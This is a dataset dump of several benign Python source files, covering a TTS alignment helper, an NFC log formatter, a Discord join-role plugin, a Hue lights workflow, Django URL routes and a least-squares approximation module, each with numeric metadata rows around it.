| 30.276596 | 99 | 0.550246 | 222 | 1,423 | 3.504505 | 0.391892 | 0.030848 | 0.046272 | 0.033419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042051 | 0.314828 | 1,423 | 46 | 100 | 30.934783 | 0.755897 | 0.305692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.035714 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7390c6ea9997d92c5a59b802c520427aaf2e179 | 2,493 | py | Python | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | """Maximum path calculation module.
This code is based on https://github.com/jaywalnut310/vits.
"""
import warnings
import numpy as np
import torch
from numba import njit, prange
try:
from .core import maximum_path_c
is_cython_avalable = True
except ImportError:
is_cython_avalable = False
warnings.warn(
"Cython version is not available. Fallback to 'EXPERIMETAL' numba version. "
"If you want to use the cython version, please build it as follows: "
"`cd espnet2/gan_tts/vits/monotonic_align; python setup.py build_ext --inplace`"
)
def maximum_path(neg_x_ent: torch.Tensor, attn_mask: torch.Tensor) -> torch.Tensor:
"""Calculate maximum path.
Args:
neg_x_ent (Tensor): Negative X entropy tensor (B, T_feats, T_text).
attn_mask (Tensor): Attention mask (B, T_feats, T_text).
Returns:
Tensor: Maximum path tensor (B, T_feats, T_text).
"""
device, dtype = neg_x_ent.device, neg_x_ent.dtype
neg_x_ent = neg_x_ent.cpu().numpy().astype(np.float32)
path = np.zeros(neg_x_ent.shape, dtype=np.int32)
t_t_max = attn_mask.sum(1)[:, 0].cpu().numpy().astype(np.int32)
t_s_max = attn_mask.sum(2)[:, 0].cpu().numpy().astype(np.int32)
if is_cython_avalable:
maximum_path_c(path, neg_x_ent, t_t_max, t_s_max)
else:
maximum_path_numba(path, neg_x_ent, t_t_max, t_s_max)
return torch.from_numpy(path).to(device=device, dtype=dtype)
@njit
def maximum_path_each_numba(path, value, t_y, t_x, max_neg_val=-np.inf):
"""Calculate a single maximum path with numba."""
index = t_x - 1
for y in range(t_y):
for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)):
if x == y:
v_cur = max_neg_val
else:
v_cur = value[y - 1, x]
if x == 0:
if y == 0:
v_prev = 0.0
else:
v_prev = max_neg_val
else:
v_prev = value[y - 1, x - 1]
value[y, x] += max(v_prev, v_cur)
for y in range(t_y - 1, -1, -1):
path[y, index] = 1
if index != 0 and (index == y or value[y - 1, index] < value[y - 1, index - 1]):
index = index - 1
@njit(parallel=True)
def maximum_path_numba(paths, values, t_ys, t_xs):
"""Calculate batch maximum path with numba."""
for i in prange(paths.shape[0]):
maximum_path_each_numba(paths[i], values[i], t_ys[i], t_xs[i])
| 31.1625 | 88 | 0.607702 | 400 | 2,493 | 3.5625 | 0.295 | 0.092632 | 0.044211 | 0.023158 | 0.13193 | 0.10386 | 0.029474 | 0.029474 | 0.029474 | 0.029474 | 0 | 0.01978 | 0.269956 | 2,493 | 79 | 89 | 31.556962 | 0.763187 | 0.162856 | 0 | 0.08 | 0 | 0 | 0.107458 | 0.018155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06 | false | 0 | 0.12 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e739779fbb9f7ff0a4abdae832fc3a6922d47f68 | 620 | py | Python | plugins/mod_log.py | nfcgate/server | 51dd45e64f91e765b1a0c9d5e5f52933006fb212 | [
"Apache-2.0"
] | 25 | 2016-01-13T21:59:00.000Z | 2022-02-05T07:55:18.000Z | plugins/mod_log.py | salmg/server | e5b485c4e2517aa741ed70948a92c61c1bc73f62 | [
"Apache-2.0"
] | 3 | 2018-05-30T13:42:12.000Z | 2020-10-13T09:56:01.000Z | plugins/mod_log.py | salmg/server | e5b485c4e2517aa741ed70948a92c61c1bc73f62 | [
"Apache-2.0"
] | 19 | 2015-08-23T02:53:33.000Z | 2021-09-28T20:53:50.000Z | from plugins.c2c_pb2 import NFCData
from plugins.c2s_pb2 import ServerData
def format_data(data):
if len(data) == 0:
return ""
nfc_data = NFCData()
nfc_data.ParseFromString(data)
letter = "C" if nfc_data.data_source == NFCData.CARD else "R"
initial = "(initial) " if nfc_data.data_type == NFCData.INITIAL else ""
return "%s: %s%s" % (letter, initial, bytes(nfc_data.data))
def handle_data(log, data):
server_message = ServerData()
server_message.ParseFromString(data)
log(ServerData.Opcode.Name(server_message.opcode), format_data(server_message.data))
return data
| 26.956522 | 88 | 0.701613 | 85 | 620 | 4.929412 | 0.388235 | 0.083532 | 0.078759 | 0.062053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009843 | 0.180645 | 620 | 22 | 89 | 28.181818 | 0.814961 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7398960f4dd8de46cd8fd73487b06b0c4d4c812 | 3,191 | py | Python | rowboat/plugins/join.py | DeJayDev/speedboat | ecce2075b69d8e18de17fac0daa702eb59cfcddd | [
"MIT"
] | 16 | 2021-01-03T14:00:48.000Z | 2022-03-01T21:03:27.000Z | rowboat/plugins/join.py | DeJayDev/speedboat | ecce2075b69d8e18de17fac0daa702eb59cfcddd | [
"MIT"
] | 14 | 2020-11-20T07:00:09.000Z | 2022-03-12T01:02:08.000Z | rowboat/plugins/join.py | SethBots/speedboat | e516261e9d34031045c70522955e8babe3d8ec6e | [
"MIT"
] | 9 | 2018-09-12T20:50:44.000Z | 2020-06-20T15:58:52.000Z | from datetime import datetime, timedelta
import gevent
from disco.types.base import SlottedModel
from disco.types.guild import VerificationLevel
from disco.util.snowflake import to_datetime
from rowboat.plugins import RowboatPlugin as Plugin
from rowboat.types import Field, snowflake
from rowboat.types.plugin import PluginConfig
class JoinPluginConfigAdvanced(SlottedModel):
low = Field(int, default=0)
medium = Field(int, default=5)
high = Field(int, default=10)
highest = Field(int, default=30, alias='extreme') # Disco calls it extreme, the client calls it Highest.
class JoinPluginConfig(PluginConfig):
join_role = Field(snowflake, default=None)
security = Field(bool, default=False)
advanced = Field(JoinPluginConfigAdvanced)
pass
@Plugin.with_config(JoinPluginConfig)
class JoinPlugin(Plugin):
@Plugin.listen('GuildMemberAdd')
def on_guild_member_add(self, event):
if event.member.user.bot:
return # I simply do not care
verification_level = event.guild.verification_level
if not event.config.security:
# Let's assume that if the server has join roles enabled and security disabled,
# they don't care about email verification.
try:
event.member.add_role(event.config.join_role)
except:
print("Failed to add_role in join plugin for user {} in {}. join_role may be None? It is currently: {}".format(
event.member.id, event.guild.id, event.config.join_role))
return
if verification_level is VerificationLevel.LOW: # "Must have a verified email on their Discord account"
# We take a "guess" that if the server has join roles enabled, they don't care about email verification.
event.member.add_role(event.config.join_role)
gevent.spawn_later(event.config.advanced.low, event.member.add_role, event.config.join_role)
return
if verification_level is VerificationLevel.MEDIUM:
gevent.spawn_later(event.config.advanced.medium, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.HIGH:
gevent.spawn_later(event.config.advanced.high, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.EXTREME:
gevent.spawn_later(event.config.advanced.highest, event.member.add_role, event.config.join_role)
@Plugin.command('debugdelay', '[length:int]', group='join', level=-1)
def trigger_delay(self, event, length: int = None):
length = length if length else 10
msg = event.channel.send_message("Sending later...")
def calc_timediff():
return "Scheduled for {} after trigger, took {}".format(length, (datetime.now() - to_datetime(msg.id)))
gevent.spawn_later(length,
lambda: event.channel.send_message("Scheduled for {} after trigger, took {}"
.format(length, (
datetime.now() - to_datetime(msg.id)) / timedelta(seconds=1))))
| 42.546667 | 127 | 0.67095 | 391 | 3,191 | 5.378517 | 0.332481 | 0.062767 | 0.049929 | 0.063243 | 0.386591 | 0.386591 | 0.320019 | 0.287684 | 0.194009 | 0.194009 | 0 | 0.004117 | 0.238797 | 3,191 | 74 | 128 | 43.121622 | 0.861671 | 0.109683 | 0 | 0.096154 | 0 | 0.019231 | 0.083275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0.019231 | 0.153846 | 0.019231 | 0.480769 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73ab7b64cfe244e1ca49e1be6932024a4d3924d | 7,062 | py | Python | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | 4 | 2020-08-12T21:56:07.000Z | 2021-06-01T09:11:12.000Z | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | null | null | null | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | 1 | 2021-12-06T02:40:43.000Z | 2021-12-06T02:40:43.000Z | # encoding: utf-8
from __future__ import unicode_literals
import colorsys
import datetime
import json
import os
import random
import sys
import time
from packages.workflow import Workflow3 as Workflow
import colors
import harmony
import request
import setup
import utils
class HueAction:
def __init__(self):
self.hue_request = request.HueRequest()
def _get_xy_color(self, color, gamut):
"""Validate and convert hex color to XY space."""
return colors.Converter(gamut).hex_to_xy(utils.get_color_value(color))
def _get_random_xy_color(self, gamut):
random_color = colorsys.hsv_to_rgb(random.random(), 1, 1)
random_color = tuple([255 * x for x in random_color])
return colors.Converter(gamut).rgb_to_xy(*random_color)
def _set_palette(self, lids, palette):
for index, lid in enumerate(lids):
self.hue_request.request(
'put',
'/lights/%s/state' % lid,
json.dumps({'xy': palette[index]})
)
def _shuffle_group(self, group_id):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
# Only shuffle the lights that are on
on_lids = [lid for lid in lids if lights[lid]['state']['on']]
on_xy = [lights[lid]['state']['xy'] for lid in on_lids]
shuffled = list(on_xy)
# Shuffle until all indexes are different (generate a derangement)
while not all([on_xy[i] != shuffled[i] for i in range(len(on_xy))]):
random.shuffle(shuffled)
self._set_palette(on_lids, shuffled)
def _set_harmony(self, group_id, mode, root):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
palette = []
on_lids = [lid for lid in lids if lights[lid]['state']['on']]
args = (len(on_lids), '#%s' % utils.get_color_value(root))
harmony_colors = getattr(harmony, mode)(*args)
for lid in on_lids:
gamut = colors.get_light_gamut(lights[lid]['modelid'])
xy = self._get_xy_color(harmony_colors.pop(), gamut)
palette.append(xy)
self._set_palette(on_lids, palette)
def execute(self, action):
is_light = action[0] == 'lights'
is_group = action[0] == 'groups'
if not is_light and not is_group:
return
rid = action[1]
function = action[2]
value = action[3] if len(action) > 3 else None
lights = utils.get_lights()
groups = utils.get_groups()
# Default API request parameters
method = 'put'
endpoint = '/groups/%s/action' % rid if is_group else '/lights/%s/state' % rid
if function == 'off':
data = {'on': False}
elif function == 'on':
data = {'on': True}
elif function == 'bri':
value = int((float(value) / 100) * 255) if value else 255
data = {'bri': value}
elif function == 'shuffle':
if not is_group:
print('Shuffle can only be called on groups.'.encode('utf-8'))
return
self._shuffle_group(rid)
return True
elif function == 'rename':
endpoint = '/groups/%s' % rid if is_group else '/lights/%s' % rid
data = {'name': value}
elif function == 'effect':
data = {'effect': value}
elif function == 'color':
if value == 'random':
if is_group:
gamut = colors.GamutA
data = {'xy': self._get_random_xy_color(gamut)}
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_random_xy_color(gamut)}
else:
try:
if is_group:
gamut = colors.GamutA
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_xy_color(value, gamut)}
except ValueError:
print('Error: Invalid color. Please use a 6-digit hex color.'.encode('utf-8'))
return
elif function == 'harmony':
if not is_group:
print('Color harmonies can only be set on groups.'.encode('utf-8'))
return
root = action[4] if len(action) > 3 else None
if value not in harmony.MODES:
print('Invalid harmony mode.'.encode('utf-8'))
return
self._set_harmony(rid, value, root)
return
elif function == 'reminder':
try:
time_delta_int = int(value)
except ValueError:
print('Error: Invalid time delta for reminder.'.encode('utf-8'))
return
reminder_time = datetime.datetime.utcfromtimestamp(time.time() + time_delta_int)
method = 'post'
data = {
'name': 'Alfred Hue Reminder',
'command': {
'address': self.hue_request.api_path + endpoint,
'method': 'PUT',
'body': {'alert': 'lselect'},
},
'time': reminder_time.replace(microsecond=0).isoformat(),
}
endpoint = '/schedules'
elif function == 'set':
# if bridge is deconz, scenes are set differently.
# what we need is groups:group_id:scenes:scene_id:recall
is_deconz = False
try:
if workflow.stored_data("full_state")["config"]["modelid"] == "deCONZ":
is_deconz = True
except:
# not sure if hue also returns config/modelid
pass
if is_deconz:
method = 'put'
endpoint = '/groups/{}/scenes/{}/recall'.format(rid, value)
data = {}
else:
data = {'scene': value}
elif function == 'save':
lids = utils.get_group_lids(rid)
method = 'post'
endpoint = '/scenes'
data = {'name': value, 'lights': lids, 'recycle': False}
else:
return
# Make the request
self.hue_request.request(method, endpoint, json.dumps(data))
return
def main(workflow):
# Handle multiple queries separated with '|' (pipe) character
queries = workflow.args[0].split('|')
for query_str in queries:
query = query_str.split(':')
if query[0] == 'set_bridge':
setup.set_bridge(query[1] if len(query) > 1 else None)
else:
action = HueAction()
try:
action.execute(query)
print(('Action completed! <%s>' % query_str).encode('utf-8'))
except ValueError:
pass
if __name__ == '__main__':
workflow = Workflow()
sys.exit(workflow.run(main)) | 31.810811 | 98 | 0.534551 | 801 | 7,062 | 4.548065 | 0.235955 | 0.03294 | 0.01647 | 0.02196 | 0.217678 | 0.152896 | 0.106231 | 0.093604 | 0.093604 | 0.079056 | 0 | 0.007877 | 0.352875 | 7,062 | 222 | 99 | 31.810811 | 0.789278 | 0.059048 | 0 | 0.272727 | 0 | 0 | 0.098462 | 0.004071 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048485 | false | 0.012121 | 0.084848 | 0 | 0.212121 | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73aed3b29e68e999fa8e3ace630cc2cc0db89e5 | 734 | py | Python | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | from django.urls import path
from accounts.views import user_profile, LogoutView, LoginView, RegisterView, user_profile_edit
urlpatterns = [
# path('login/', login_user, name='login user'),
path('login/', LoginView.as_view(), name='login user'), # CBV
# path('logout/', logout_user, name='logout user'),
path('logout/', LogoutView.as_view(), name='logout user'), # CBV
# path('register/', register_user, name='register user'),
path('register/', RegisterView.as_view(), name='register user'), # CBV
# path('profile/', user_profile, name='current user profile'),
path('profile/<int:pk>', user_profile, name='user profile'),
path('edit/<int:pk>', user_profile_edit, name='user profile edit'),
]
| 43.176471 | 95 | 0.678474 | 94 | 734 | 5.159574 | 0.255319 | 0.181443 | 0.092784 | 0.065979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144414 | 734 | 16 | 96 | 45.875 | 0.772293 | 0.30654 | 0 | 0 | 0 | 0 | 0.227545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73ccdac55d151051f197eec351b7129cd6e61de | 13,790 | py | Python | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 86 | 2015-12-17T12:57:11.000Z | 2022-03-26T01:53:47.000Z | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 9 | 2017-04-16T21:57:29.000Z | 2021-04-17T08:09:30.000Z | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 43 | 2016-03-11T19:33:14.000Z | 2022-03-05T00:21:57.000Z | """
Approximation of functions by linear combination of basis functions in
function spaces and the least squares method or the collocation method
for determining the coefficients.
"""
from __future__ import print_function
import sympy as sym
import numpy as np
import mpmath
import matplotlib.pyplot as plt
#import scitools.std as plt
def least_squares_non_verbose(f, psi, Omega, symbolic=True):
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
for i in range(N+1):
for j in range(i, N+1):
integrand = psi[i]*psi[j]
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
u = sum(c[i]*psi[i] for i in range(len(psi)))
return u, c
def least_squares(f, psi, Omega, symbolic=True):
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
for j in range(i, N+1):
print('(%d,%d)' % (i, j))
integrand = psi[i]*psi[j]
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
print()
print('A:\n', A, '\nb:\n', b)
if symbolic:
c = A.LUsolve(b) # symbolic solve
# c is a sympy Matrix object, numbers are in c[i,0]
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
else:
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
print('coeff:', c)
u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def numerical_linsys_solve(A, b, floating_point_calc='sympy'):
"""
Given a linear system Au=b as sympy arrays, solve the
system using different floating-point software.
floating_point_calc may be 'sympy', 'numpy.float64',
'numpy.float32'.
This function is used to investigate ill-conditioning
of linear systems arising from approximation methods.
"""
if floating_point_calc == 'sympy':
#mpmath.mp.dsp = 10 # does not affect the computations here
A = mpmath.fp.matrix(A)
b = mpmath.fp.matrix(b)
print('A:\n', A, '\nb:\n', b)
c = mpmath.fp.lu_solve(A, b)
#c = mpmath.lu_solve(A, b) # more accurate
print('mpmath.fp.lu_solve:', c)
elif floating_point_calc.startswith('numpy'):
import numpy as np
# Double precision (float64) by default
A = np.array(A.evalf())
b = np.array(b.evalf())
if floating_point_calc == 'numpy.float32':
# Single precision
A = A.astype(np.float32)
b = b.astype(np.float32)
c = np.linalg.solve(A, b)
print('numpy.linalg.solve, %s:' % floating_point_calc, c)
def least_squares_orth(f, psi, Omega, symbolic=True):
"""
Same as least_squares, but for orthogonal
basis such that one avoids calling up standard
Gaussian elimination.
"""
N = len(psi) - 1
A = [0]*(N+1) # plain list to hold symbolic expressions
b = [0]*(N+1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
print('(%d,%d)' % (i, i))
# Assume orthogonal psi can be be integrated symbolically
# and that this is a successful/possible integration
A[i] = sym.integrate(psi[i]**2, (x, Omega[0], Omega[1]))
# Fallback on numerical integration if f*psi is too difficult
# to integrate
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i] = I
print('A:\n', A, '\nb:\n', b)
c = [b[i]/A[i] for i in range(len(b))]
print('coeff:', c)
u = 0
#for i in range(len(psi)):
# u += c[i]*psi[i]
u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def trapezoidal(values, dx):
"""
Integrate a function whose values on a mesh with spacing dx
are in the array values.
"""
#return dx*np.sum(values)
return dx*(np.sum(values) - 0.5*values[0] - 0.5*values[-1])
def least_squares_numerical(f, psi, N, x,
integration_method='scipy',
orthogonal_basis=False):
"""
Given a function f(x) (Python function), a basis specified by the
Python function psi(x, i), and a mesh x (array), return the best
approximation to f(x) in in the space V spanned by the functions
in the list psi. The best approximation is represented as an array
of values corresponding to x. All calculations are performed
numerically. integration_method can be `scipy` or `trapezoidal`
(the latter uses x as mesh for evaluating f).
"""
import scipy.integrate
A = np.zeros((N+1, N+1))
b = np.zeros(N+1)
if not callable(f) or not callable(psi):
raise TypeError('f and psi must be callable Python functions')
Omega = [x[0], x[-1]]
dx = x[1] - x[0] # assume uniform partition
print('...evaluating matrix...', end=' ')
for i in range(N+1):
j_limit = i+1 if orthogonal_basis else N+1
for j in range(i, j_limit):
print('(%d,%d)' % (i, j))
if integration_method == 'scipy':
A_ij = scipy.integrate.quad(
lambda x: psi(x,i)*psi(x,j),
Omega[0], Omega[1], epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
A_ij = mpmath.quad(
lambda x: psi(x,i)*psi(x,j),
[Omega[0], Omega[1]])
else:
values = psi(x,i)*psi(x,j)
A_ij = trapezoidal(values, dx)
A[i,j] = A[j,i] = A_ij
if integration_method == 'scipy':
b_i = scipy.integrate.quad(
lambda x: f(x)*psi(x,i), Omega[0], Omega[1],
epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
b_i = mpmath.quad(
lambda x: f(x)*psi(x,i), [Omega[0], Omega[1]])
else:
values = f(x)*psi(x,i)
b_i = trapezoidal(values, dx)
b[i] = b_i
c = b/np.diag(A) if orthogonal_basis else np.linalg.solve(A, b)
u = sum(c[i]*psi(x, i) for i in range(N+1))
return u, c
def interpolation(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, that interpolates
f at the given points. Must have len(points) = len(psi)
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i] (alternative to subs?)
psi_sym = psi # save symbolic expression
x = sym.Symbol('x')
psi = [sym.lambdify([x], psi[i], 'mpmath') for i in range(N+1)]
f = sym.lambdify([x], f, 'mpmath')
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
print('(%d,%d)' % (i, j))
A[i,j] = psi[j](points[i])
b[i,0] = f(points[i])
print()
print('A:\n', A, '\nb:\n', b)
c = A.LUsolve(b)
# c is a sympy Matrix object, turn to list
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
print('coeff:', c)
# u = sym.simplify(sum(c[i,0]*psi_sym[i] for i in range(N+1)))
u = sym.simplify(sum(c[i]*psi_sym[i] for i in range(N+1)))
print('approximation:', u)
return u, c
collocation = interpolation # synonym in this module
def regression(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, using a regression
method based on points. Must have len(points) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
f = sym.lambdify([x], f)
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f(points[k])
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
def regression_with_noise(f, psi, points):
"""
Given a data points in the array f, return the approximation
to the data in the space V, spanned by psi, using a regression
method based on f and the corresponding coordinates in points.
Must have len(points) = len(f) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
if not isinstance(f, np.ndarray):
raise TypeError('f is %s, must be ndarray' % type(f))
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f[k]
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
def comparison_plot(
f, u, Omega, filename='tmp',
plot_title='', ymin=None, ymax=None,
u_legend='approximation',
points=None, point_values=None, points_legend=None,
legend_loc='upper right',
show=True):
"""Compare f(x) and u(x) for x in Omega in a plot."""
x = sym.Symbol('x')
print('f:', f)
print('u:', u)
f = sym.lambdify([x], f, modules="numpy")
u = sym.lambdify([x], u, modules="numpy")
if len(Omega) != 2:
raise ValueError('Omega=%s must be an interval (2-list)' % str(Omega))
# When doing symbolics, Omega can easily contain symbolic expressions,
# assume .evalf() will work in that case to obtain numerical
# expressions, which then must be converted to float before calling
# linspace below
if not isinstance(Omega[0], (int,float)):
Omega[0] = float(Omega[0].evalf())
if not isinstance(Omega[1], (int,float)):
Omega[1] = float(Omega[1].evalf())
resolution = 601 # no of points in plot (high resolution)
xcoor = np.linspace(Omega[0], Omega[1], resolution)
# Vectorized functions expressions does not work with
# lambdify'ed functions without the modules="numpy"
exact = f(xcoor)
approx = u(xcoor)
plt.figure()
plt.plot(xcoor, approx, '-')
plt.plot(xcoor, exact, '--')
legends = [u_legend, 'exact']
if points is not None:
if point_values is None:
# Use f
plt.plot(points, f(points), 'ko')
else:
# Use supplied points
plt.plot(points, point_values, 'ko')
if points_legend is not None:
legends.append(points_legend)
else:
legends.append('points')
plt.legend(legends, loc=legend_loc)
plt.title(plot_title)
plt.xlabel('x')
if ymin is not None and ymax is not None:
plt.axis([xcoor[0], xcoor[-1], ymin, ymax])
plt.savefig(filename + '.pdf')
plt.savefig(filename + '.png')
if show:
plt.show()
if __name__ == '__main__':
print('Module file not meant for execution.')
